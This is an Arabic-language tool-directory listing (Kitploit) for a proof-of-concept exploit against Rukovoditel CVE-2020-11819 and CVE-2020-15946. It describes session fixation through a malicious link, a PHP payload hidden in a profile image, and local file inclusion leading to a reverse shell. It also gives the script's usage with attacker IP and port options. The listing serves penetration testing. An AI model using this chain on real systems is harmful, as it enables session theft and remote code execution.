Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
PoC-RCE-Rukovoditel — إثبات المفهوم لـ CVE-2020-11819 و CVE-2020-15946 | Kitploit
أدوات/GitHubGitHub/danyx07/poc-rce-rukovoditel
توليد الحمولةتحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراق
GitHubdanyx07/poc-rce-rukovoditel

PoC-RCE-Rukovoditel

إثبات المفهوم لـ CVE-2020-11819 و CVE-2020-15946

عرض المستودع
منذ 5 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

PoC-RCE-Rukovoditel

إثبات المفهوم لثغرات CVE-2020-11819 و CVE-2020-15946. تم اختباره على Rukovoditel 2.4.x و 2.5.x و 2.6.1

الوصف:

هذا الاستغلال له وضعان للتنفيذ، باستخدام ثغرة تثبيت الجلسة (CVE-2020-15946) أو باستخدام بيانات اعتماد الوصول لأي حساب تحت أي ملف تعريف. مع الخيار --type L، سيقوم هذا البرنامج النصي بإنشاء رابط ضار، إذا تم الوصول إلى الرابط عبر متصفح من قبل الضحية، سيتم تعيين معرف جلسة عشوائي سيُستخدم لسرقة جلستهم بعد تحميل صورة تحتوي على محتوى PHP في صورة ملفهم الشخصي، ثم استخدام تضمين الملف المحلي (CVE-2020-11819) للحصول على قوقعة عكسية جميلة، أو باستخدام الخيارات --type C -u -p يمكنك توفير بيانات اعتماد، تحميل الصورة بمحتوى PHP واستخدام تضمين الملف المحلي (CVE-2020-11819) لتحقيق تنفيذ الكود.

نصيحة محترف: تذكر التحقق من تفعيل وحدة التسجيل ;)

الاستخدام

exploit.py -t -a L --ip attacker IP --port attacker port [options] exploit.py -t -a C -u -p --ip attacker IP --port attacker port [options]

تنفيذ الكود عن بُعد بعد المصادقة لـ rukovoditel، إصدار البرنامج النصي 1.0

الوسائط الاختيارية:
-h, --help عرض رسالة المساعدة هذه والخروج
-t URL, --target URL المسار الكامل أو URL لنظام Rukovoditel http://url/path/to/cms/
-u USER, --user USER اسم المستخدم للمصادقة
-p PASSWORD, --password PASSWORD كلمة المرور للمصادقة
-a TYPE, --type TYPE استخدم -a L لإنشاء الرابط وسرقة الجلسة، أو استخدم -a C إذا كان لديك بيانات اعتماد الوصول لتطبيق الويب
--ip IP_ATTACKER عنوان IP للمهاجم للقوقعة العكسية!
--port PORT_ATTACKER المنفذ لاتصال القوقعة العكسية
--proxy PROXY تعيين وكيل HTTP للتصحيح http://127.0.0.1:8080

تنزيل الأداة